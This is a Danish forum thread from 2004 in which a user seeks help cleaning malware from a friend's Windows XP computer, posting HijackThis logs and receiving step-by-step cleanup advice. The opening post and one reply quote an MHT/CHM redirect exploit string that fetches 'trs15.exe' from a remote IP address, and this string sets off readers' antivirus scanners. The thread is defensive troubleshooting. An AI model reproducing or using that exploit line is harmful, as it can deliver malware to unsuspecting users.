Avatar billede albot Nybegynder
05. december 2004 - 22:15 Der er 14 kommentarer og
1 løsning

Hvad er trs15.exe? Vil nogen kigge disse logs igennem?

Problem på venindes computer. Jeg skulle bare lige opdatere win xp med sp2, installere norton systemworks 2004 inkl. antivirus 2004 og zonealarm 5. Dog er jeg ikke sikker på at alt er ok på pc'en

jeg har kørt mwav.exe - den fandt:
C:\WINDOWS\autoload.exe, men oplyste - marked as - not a virus - no action taken. Det forstår jeg ikke? Derudover fandt den ikke noget.

Med hijackthis fandt jeg:
ms-its:mhtml:file://C:\foo.mht!http://82.179.166.145/x15.chm::/trs15.exe
Jeg valgte at fjerne den, da den så suspekt ud. Jeg kunne desværre ikke søge information om filen på nettet.

Når jeg søgte i google på trs15.exe for at søge info om filen fik jeg hver gang at vide at der var en bloodhound exploit 6 mine midlertidige internetfiler, hvorefter maskinen periodisk hang underligt. Kunne køre rundt med curseren, men kunne ikke klikke på noget. Dette problem eksisterer stadig trods alle mine diverse scans. Dog umiddelbart kun efter en googlesøgning på trs15.exe!!!!!

Håber nogen kan forklare ovenstående problem og mere eller mindre garantere at maskinen nu er ren.

Jeg har en teori om at det skyldes norton antivirus 2004, der blokerer forskellige processer indtil den kan scanne dem. Lyder det plausibelt?

Adaware fandt lidt forskelligt og Giant fandt også lidt. Bl.a. backweb adware relateret til kodak kamerasoftware.

Herunder hijackthis-log og efterfølgende oversigt over løbende processer - taget fra nortons process viewer.
----------Hijackthis-log---------------------------------------
Logfile of HijackThis v1.98.2
Scan saved at 19:34:16, on 05-12-2004
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Programmer\Fælles filer\Symantec Shared\ccSetMgr.exe
C:\Programmer\Fælles filer\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\drivers\KodakCCS.exe
C:\Programmer\Fælles filer\Microsoft Shared\VS7Debug\mdm.exe
C:\Programmer\Norton SystemWorks\Norton Antivirus\navapsvc.exe
C:\PROGRA~1\NORTON~1\NORTON~2\NPROTECT.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\Programmer\Norton SystemWorks\Norton Antivirus\SAVScan.exe
C:\WINDOWS\System32\ScsiAccess.EXE
C:\PROGRA~1\NORTON~1\NORTON~2\SPEEDD~1\NOPDB.EXE
C:\WINDOWS\System32\svchost.exe
C:\Programmer\Fælles filer\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ZONELABS\vsmon.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Programmer\QuickTime\qttask.exe
C:\Programmer\Browser Mouse\Browser Mouse\1.1\MOUSE32A.EXE
C:\Programmer\MultiMedia Keyboard\MultiMedia Keyboard\1.0\KbdAp32A.exe
C:\Programmer\Fælles filer\Symantec Shared\Security Center\SymWSC.exe
C:\Programmer\Fælles filer\Real\Update_OB\realsched.exe
C:\Programmer\Zone Labs\ZoneAlarm\zlclient.exe
C:\Programmer\D-Tools\daemon.exe
C:\Programmer\Fælles filer\Symantec Shared\ccApp.exe
C:\Programmer\Hewlett-Packard\AiO\hp psc 700 series\Bin\hpobrt07.exe
C:\Programmer\Adobe\Acrobat 5.0\Distillr\AcroTray.exe
C:\Programmer\Kodak\Kodak EasyShare software\bin\EasyShare.exe
C:\Programmer\Kodak\KODAK Software Updater\7288971\Program\backWeb-7288971.exe
C:\PROGRA~1\HEWLET~1\AiO\Shared\Bin\hpoevm07.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Programmer\Hewlett-Packard\AiO\Shared\bin\hpOSTS07.exe
C:\Programmer\Messenger\msmsgs.exe
D:\Nye programmer\hijackthis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://signon.stofanet.dk/
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Hyperlinks
O1 - Hosts: 216.40.230.4 desktop.kazaa.com
O1 - Hosts: 216.40.230.4 alpha.kazaa.com
O1 - Hosts: 216.40.230.4 shop.kazaa.com
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programmer\Adobe\Acrobat 5.0\Acrobat\ActiveX\AcroIEHelper.ocx
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Programmer\Norton SystemWorks\Norton Antivirus\NavShExt.dll
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Programmer\Norton SystemWorks\Norton Antivirus\NavShExt.dll
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\System32\NeroCheck.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Programmer\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [LWBMOUSE] C:\Programmer\Browser Mouse\Browser Mouse\1.1\MOUSE32A.EXE
O4 - HKLM\..\Run: [LWBKEYBOARD] C:\Programmer\MultiMedia Keyboard\MultiMedia Keyboard\1.0\KbdAp32A.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Programmer\Fælles filer\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [Zone Labs Client] "C:\Programmer\Zone Labs\ZoneAlarm\zlclient.exe"
O4 - HKLM\..\Run: [DAEMON Tools-1033] "C:\Programmer\D-Tools\daemon.exe"  -lang 1033
O4 - HKLM\..\Run: [ccApp] "C:\Programmer\Fælles filer\Symantec Shared\ccApp.exe"
O4 - HKCU\..\Run: [MsnMsgr] "C:\Programmer\MSN Messenger\MsnMsgr.Exe" /background
O4 - Startup: ZoneAlarm Pro.lnk = C:\Programmer\Zone Labs\ZoneAlarm\zapro.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Programmer\Microsoft Office\Office10\OSA.EXE
O4 - Global Startup: HPAiODevice(hp psc 700 series) - 1.lnk = C:\Programmer\Hewlett-Packard\AiO\hp psc 700 series\Bin\hpobrt07.exe
O4 - Global Startup: Acrobat Assistant.lnk = C:\Programmer\Adobe\Acrobat 5.0\Distillr\AcroTray.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = ?
O4 - Global Startup: Kodak EasyShare software.lnk = C:\Programmer\Kodak\Kodak EasyShare software\bin\EasyShare.exe
O4 - Global Startup: KODAK Software Updater.lnk = C:\Programmer\Kodak\KODAK Software Updater\7288971\Program\backWeb-7288971.exe
O8 - Extra context menu item: E&ksporter til Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Programmer\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://v5.windowsupdate.microsoft.com/v5consumer/V5Controls/en/x86/client/wuweb_site.cab?1102249572562
O16 - DPF: {D8575CE3-3432-4540-88A9-85A1325D3375} (e-Safekey®) - https://netbank.bgbank.dk/html/activex/e-Safekey/BG/e-Safekey.cab
O16 - DPF: {F6A56D95-A3A3-11D2-AC26-400000058481} (Danske e-Sec) - https://netbank.bgbank.dk/bgnetbank/activex/DanskeSikker.cab

----------løbende processer jf. process viewer--------------
AcroTray.exe    1744    C:\Programmer\Adobe\Acrobat 5.0\Distillr\AcroTray.exe
alg.exe    2728    C:\WINDOWS\System32\alg.exe
backWeb-7288971.exe    2200    C:\Programmer\Kodak\KODAK Software Updater\7288971\Program\backWeb-7288971.exe
ccApp.exe    392    C:\Programmer\Fælles filer\Symantec Shared\ccApp.exe
ccEvtMgr.exe    1044    C:\Programmer\Fælles filer\Symantec Shared\ccEvtMgr.exe
ccSetMgr.exe    1012    C:\Programmer\Fælles filer\Symantec Shared\ccSetMgr.exe
csrss.exe    460    C:\WINDOWS\system32\csrss.exe
ctfmon.exe    3472    C:\WINDOWS\system32\ctfmon.exe
daemon.exe    412    C:\Programmer\D-Tools\daemon.exe
EasyShare.exe    2072    C:\Programmer\Kodak\Kodak EasyShare software\bin\EasyShare.exe
Explorer.EXE    1792    C:\WINDOWS\Explorer.EXE
hpobrt07.exe    1624    C:\Programmer\Hewlett-Packard\AiO\hp psc 700 series\Bin\hpobrt07.exe
hpoevm07.exe    2360    C:\PROGRA~1\HEWLET~1\AiO\Shared\Bin\hpoevm07.exe
hpOSTS07.exe    2788    C:\Programmer\Hewlett-Packard\AiO\Shared\bin\hpOSTS07.exe
KbdAp32A.exe    224    C:\Programmer\MultiMedia Keyboard\MultiMedia Keyboard\1.0\KbdAp32A.exe
KodakCCS.exe    1344    C:\WINDOWS\system32\drivers\KodakCCS.exe
lsass.exe    548    C:\WINDOWS\system32\lsass.exe
mdm.exe    1368    C:\Programmer\Fælles filer\Microsoft Shared\VS7Debug\mdm.exe
MOUSE32A.EXE    196    C:\Programmer\Browser Mouse\Browser Mouse\1.1\MOUSE32A.EXE
msmsgs.exe    2584    C:\Programmer\Messenger\msmsgs.exe
navapsvc.exe    1404    C:\Programmer\Norton SystemWorks\Norton Antivirus\navapsvc.exe
NOPDB.EXE    1676    C:\PROGRA~1\NORTON~1\NORTON~2\SPEEDD~1\NOPDB.EXE
NPROTECT.EXE    1444    C:\PROGRA~1\NORTON~1\NORTON~2\NPROTECT.EXE
nvsvc32.exe    1468    C:\WINDOWS\System32\nvsvc32.exe
OPScan.exe    3600    C:\Programmer\Norton SystemWorks\Norton Antivirus\OPScan.exe
PrcView.exe    2676    C:\Programmer\Norton SystemWorks\Process Viewer\PrcView.exe
qttask.exe    204    C:\Programmer\QuickTime\qttask.exe
realsched.exe    260    C:\Programmer\Fælles filer\Real\Update_OB\realsched.exe
SAVScan.exe    1536    C:\Programmer\Norton SystemWorks\Norton Antivirus\SAVScan.exe
ScsiAccess.EXE    1612    C:\WINDOWS\System32\ScsiAccess.EXE
services.exe    536    C:\WINDOWS\system32\services.exe
smss.exe    364    C:\WINDOWS\System32\smss.exe
SOUNDMAN.EXE    2036    C:\WINDOWS\SOUNDMAN.EXE
spoolsv.exe    1208    C:\WINDOWS\system32\spoolsv.exe
svchost.exe    692    C:\WINDOWS\system32\svchost.exe
svchost.exe    756    C:\WINDOWS\system32\svchost.exe
svchost.exe    796    C:\WINDOWS\System32\svchost.exe
svchost.exe    852    C:\WINDOWS\System32\svchost.exe
svchost.exe    960    C:\WINDOWS\System32\svchost.exe
svchost.exe    1780    C:\WINDOWS\System32\svchost.exe
symlcsvc.exe    1804    C:\Programmer\Fælles filer\Symantec Shared\CCPD-LC\symlcsvc.exe
SymWSC.exe    252    C:\Programmer\Fælles filer\Symantec Shared\Security Center\SymWSC.exe
vsmon.exe    1876    C:\WINDOWS\system32\ZONELABS\vsmon.exe
winlogon.exe    492    C:\WINDOWS\system32\winlogon.exe
wmiprvse.exe    2540    C:\WINDOWS\System32\wbem\wmiprvse.exe
wuauclt.exe    600    C:\WINDOWS\system32\wuauclt.exe
zlclient.exe    428    C:\Programmer\Zone Labs\ZoneAlarm\zlclient.exe
Avatar billede webgon Nybegynder
05. december 2004 - 22:19 #1
Hmm.. Hvad sker der?

Af en eller anden mærkelig grund gik McAfee helt amok da jeg åbnede denne side!

Den poppede op med en virusscan alert over filen 'Exploit-MhtRedir.gen'.

Er det bare tilfældigt og er min PC sindssyg, eller er der andre der har samme problem??

/webgon
Avatar billede thesurfer Nybegynder
05. december 2004 - 22:24 #2
Du har jo skrevet kode/filnavn/osv på noget der har med virus at gøre.. internet sider bliver automatisk downloaded til din computere, før du kan se dem i din browser.

Dit antivirus program, vil derfor gå amok hver gang du kigger/loader/reloader dette spm.
Avatar billede albot Nybegynder
05. december 2004 - 22:28 #3
Måske er det bare det der er problemt på nævnte computer - at jeg søger i google på trs15.exe. Måske er skidtet fjernet, hvad det end er?
Avatar billede thesurfer Nybegynder
05. december 2004 - 22:31 #4
..og ja, det er snavs:

ms-its:mhtml:file://C:\foo.mht!http://82.179.166.145/x15.chm::/trs15.exe

vent med at gøre yderligere, indtil en af de HijackThis-kyndige kommer forbi..
Avatar billede m-smith Nybegynder
05. december 2004 - 22:32 #5
Mit Norton AntiVirus gik også helt amok!

Bloodhound Exploit 6 siger den...
Avatar billede thesurfer Nybegynder
05. december 2004 - 22:37 #6
Et andet spm, der burde give jer en advarsel om virus: http://www.eksperten.dk/spm/506338
Avatar billede bennylarsen Nybegynder
05. december 2004 - 22:58 #7
mit antivirus reagerede med virus advarsel med det samme.
Avatar billede aovergaard Nybegynder
06. december 2004 - 02:44 #8
Hej albot

Hent CWShredder her:
www.spywareinfo.dk/CWShredder.exe

Kør programmet, afbryd din internetforbindelse fysisk (stikket ud), luk alle vinduer undtaget cwshredder
Klik på Fix, den scanner nu, når den er færdigt klik på Next, klik på Exit.

Kør en scanning med Hijackthis, så du kan se alle filer.
Du får herunder nogle filer, som du skal fixe. Det, du skal gøre, er at sætte et flueben ud for disse filer. Når du har gjort det, så lukker du alle andre vinduer ned. Det er meget vigtigt at det eneste vindue, som er åbent er HijackThis vinduet. Husk også at lukke dette vindue, når du har markeret filerne. Nu må du fixe. Klik på Fix checked.

Det er disse, som skal fixes: måske er de væk efter det foregående fix.

O1 - Hosts: 216.40.230.4 desktop.kazaa.com
O1 - Hosts: 216.40.230.4 alpha.kazaa.com
O1 - Hosts: 216.40.230.4 shop.kazaa.com

O4 - HKLM\..\Run: [TkBellExe] "C:\Programmer\Fælles filer\Real\Update_OB\realsched.exe" -osboot

O8 - Extra context menu item: E&ksporter til Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
-------------------------------------------------------------------
Disse er unødvendige at have liggende i din opstart, da de alle kan nås via startprogrammer. De ligger bare og ”sluger” computerens kræfter.
Du kan Fjerne vingen til venstre for følgende programmer, hvis du ønsker det:
Start
Kør
Skriv: msconfig
Ok
Fanebladet start

[SoundMan] SOUNDMAN.EXE
[NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
[nwiz] nwiz.exe /install
[QuickTime Task] "C:\Programmer\QuickTime\qttask.exe" -atboottime
C:\Programmer\Microsoft Office\Office10\OSA.EXE

Genstart, du får en advarsel om, at start er lavet om. Sig ok til det, og fjern flueben i vis denne advarsel.
-------------------------------------------------------------------

For at kunne se alle filer og mapper, så følg denne vejledning:
Åbn en mappe, klik på Funktioner >Mappeindstillinger >Vis.
Fjern flueben ved "Skjul beskyttede operativsystemfiler".
Fjern flueben ved "Skjul filtypenavne for kendte filtyper".
Sæt prik i "Vis skjulte filer og mapper".

Genstart i fejlsikret tilstand søg og slet de filer/mapper jeg har markeret med rød:

C:\Programmer\Fælles filer\Real\Update_OB\realsched.exe

Genstart din computer.
Hent og Installer ”Ad-Aware hvis du da ikke har det i forvejen SE version 1.05”  (Bemærk ny version)
http://www.download.com/3000-2144-10045910.html?part=69274&subj=dlpage&tag=button
Lad den opdatere sine spywaredefinitioner og kør så en scan (Perform Full System Scan). Efter den har renset hvad den finder, genstart din computer.

Genstart din computer, kør en ny scanning med HijackThis, kopier en ny log herind til tjek.

Ang. den fil du har slettet, så ser den IP adresse ud til at komme fra Rusland, så det var vist fint nok at du fik den slettet. Søg overalt på din maskine efter denne fil og slet alt hvad du finder: trs15.exe Er den der ikke mere, så fred være med det.
Avatar billede aovergaard Nybegynder
06. december 2004 - 02:45 #9
Ok jeg kan så ikke markere filer herinde, det er filen: realsched.exe du skal slette *S*
Avatar billede albot Nybegynder
06. december 2004 - 08:52 #10
Foreløbig tak for hjælpen. Jeg følger ovenstående råd og vender tilbage senere på dagen.
Avatar billede albot Nybegynder
10. december 2004 - 22:58 #11
undskyld ventetiden. Her er ny log. Der blev ikke fundet noget andet end cookies. Trs15.exe er ikke længere på systemet. CW Schredder oplyste at notepad.exe kunne være en orm, hvis filen var sammensat "ramdom letters". Men det er den jo ikke, så jeg beholdte den.

Sig til hvis der er noget :-)

-----------
Logfile of HijackThis v1.98.2
Scan saved at 20:13:54, on 10-12-2004
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Programmer\Fælles filer\Symantec Shared\ccSetMgr.exe
C:\Programmer\Fælles filer\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\drivers\KodakCCS.exe
C:\Programmer\Fælles filer\Microsoft Shared\VS7Debug\mdm.exe
C:\Programmer\Norton SystemWorks\Norton Antivirus\navapsvc.exe
C:\PROGRA~1\NORTON~1\NORTON~2\NPROTECT.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\Programmer\Norton SystemWorks\Norton Antivirus\SAVScan.exe
C:\WINDOWS\System32\ScsiAccess.EXE
C:\PROGRA~1\NORTON~1\NORTON~2\SPEEDD~1\NOPDB.EXE
C:\WINDOWS\System32\svchost.exe
C:\Programmer\Fælles filer\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\system32\ZONELABS\vsmon.exe
C:\WINDOWS\Explorer.EXE
C:\Programmer\Fælles filer\Symantec Shared\Security Center\SymWSC.exe
C:\Programmer\Browser Mouse\Browser Mouse\1.1\MOUSE32A.EXE
C:\Programmer\MultiMedia Keyboard\MultiMedia Keyboard\1.0\KbdAp32A.exe
C:\Programmer\Zone Labs\ZoneAlarm\zlclient.exe
C:\Programmer\D-Tools\daemon.exe
C:\Programmer\Fælles filer\Symantec Shared\ccApp.exe
C:\Programmer\MSN Messenger\MsnMsgr.Exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programmer\Hewlett-Packard\AiO\hp psc 700 series\Bin\hpobrt07.exe
C:\Programmer\Adobe\Acrobat 5.0\Distillr\AcroTray.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Programmer\Kodak\Kodak EasyShare software\bin\EasyShare.exe
C:\PROGRA~1\HEWLET~1\AiO\Shared\Bin\hpoevm07.exe
C:\Programmer\Messenger\msmsgs.exe
C:\Programmer\Hewlett-Packard\AiO\Shared\bin\hpOSTS07.exe
D:\Nye programmer\hijackthis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://signon.stofanet.dk/
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Hyperlinks
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programmer\Adobe\Acrobat 5.0\Acrobat\ActiveX\AcroIEHelper.ocx
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Programmer\Norton SystemWorks\Norton Antivirus\NavShExt.dll
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Programmer\Norton SystemWorks\Norton Antivirus\NavShExt.dll
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\System32\NeroCheck.exe
O4 - HKLM\..\Run: [LWBMOUSE] C:\Programmer\Browser Mouse\Browser Mouse\1.1\MOUSE32A.EXE
O4 - HKLM\..\Run: [LWBKEYBOARD] C:\Programmer\MultiMedia Keyboard\MultiMedia Keyboard\1.0\KbdAp32A.exe
O4 - HKLM\..\Run: [Zone Labs Client] "C:\Programmer\Zone Labs\ZoneAlarm\zlclient.exe"
O4 - HKLM\..\Run: [DAEMON Tools-1033] "C:\Programmer\D-Tools\daemon.exe"  -lang 1033
O4 - HKLM\..\Run: [ccApp] "C:\Programmer\Fælles filer\Symantec Shared\ccApp.exe"
O4 - HKCU\..\Run: [MsnMsgr] "C:\Programmer\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Startup: ZoneAlarm Pro.lnk = C:\Programmer\Zone Labs\ZoneAlarm\zapro.exe
O4 - Global Startup: HPAiODevice(hp psc 700 series) - 1.lnk = C:\Programmer\Hewlett-Packard\AiO\hp psc 700 series\Bin\hpobrt07.exe
O4 - Global Startup: Acrobat Assistant.lnk = C:\Programmer\Adobe\Acrobat 5.0\Distillr\AcroTray.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = ?
O4 - Global Startup: Kodak EasyShare software.lnk = C:\Programmer\Kodak\Kodak EasyShare software\bin\EasyShare.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Programmer\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://v5.windowsupdate.microsoft.com/v5consumer/V5Controls/en/x86/client/wuweb_site.cab?1102249572562
O16 - DPF: {D8575CE3-3432-4540-88A9-85A1325D3375} (e-Safekey®) - https://netbank.bgbank.dk/html/activex/e-Safekey/BG/e-Safekey.cab
O16 - DPF: {F6A56D95-A3A3-11D2-AC26-400000058481} (Danske e-Sec) - https://netbank.bgbank.dk/bgnetbank/activex/DanskeSikker.cab
Avatar billede aovergaard Nybegynder
11. december 2004 - 14:51 #12
Hej albot

Din log er atter ren. ;-)

Efter sådan en tur er det altid en god ide og rydde op i systemgendannelses filerne. Deaktiver systemgendannelse
(http://www.spywarefri.dk/virusscannere.htm#alle) - genstart din computer - aktiver systemgendannelse.


Du kan rense browser cachen

1.    Klik på Funktioner - Internetindstillinger

2.    Under midlertidige filer, klik på Slet cookies

3.    Under midlertidige filer, klik på slet filer – sæt flueben i slet alt offline indhold

4.    Under Oversigten, klik på ryd oversigten

5.    Klik på ok.

Tøm din papirkurv.

Du kan rense temp med denne fil, det tager kun få sek.
www.spywareinfo.dk/download/cleantempxp2k.bat

Lidt råd med på vejen herfra skal du da også have.
For at sikre din pc fremover ville det være en god idé at bruge nogle af programmerne fra vores lille pakke som du kan se her:
http://www.spywarefri.dk/pakken.htm

Især vil jeg anbefale Spybot/og eller Ad-aware, SpywareBlaster, IE Privacy Keeper/el. EmtyTempFolder, IE-Spyad og SpywareGuard som minimum. De er alle gratis, fylder ikke meget, sløver ikke din pc og konflikter ikke med dine andre programmer

Ønsker du ikke mange små prg. så kan du i stedet købe et prg. som Spy Sweeper. Den ligger også i pakken, hvor du kan læse lidt mere. Der ligger også et link til dansk manual. Jeg kan varmt anbefale dette prg. Installer og så gerne SpywareBlaster som vil stå godt til Spy Sweeper.

Og så skal du også lige skjule dine filer og mapper igen, så du ikke ved en fejl kommer til at slette en vigtig fil. Det gør du samme sted, hvor du satte det til at vise alle filer, denne gang vælger du bare: Vis ikke skjulte filer og mapper.
Avatar billede albot Nybegynder
11. december 2004 - 15:10 #13
Hejsa,

mange tak for svaret og de gåde råd. :-)
Avatar billede albot Nybegynder
11. december 2004 - 15:11 #14
mente gode råd ;-)
Avatar billede aovergaard Nybegynder
11. december 2004 - 15:34 #15
Hej albot.

Velbekomme dig. Rigtig god Week-end.

Og tak for point ;)
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
IT-kurser om Microsoft 365, sikkerhed, personlig vækst, udvikling, digital markedsføring, grafisk design, SAP og forretningsanalyse.

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Du kan også logge ind via nedenstående tjenester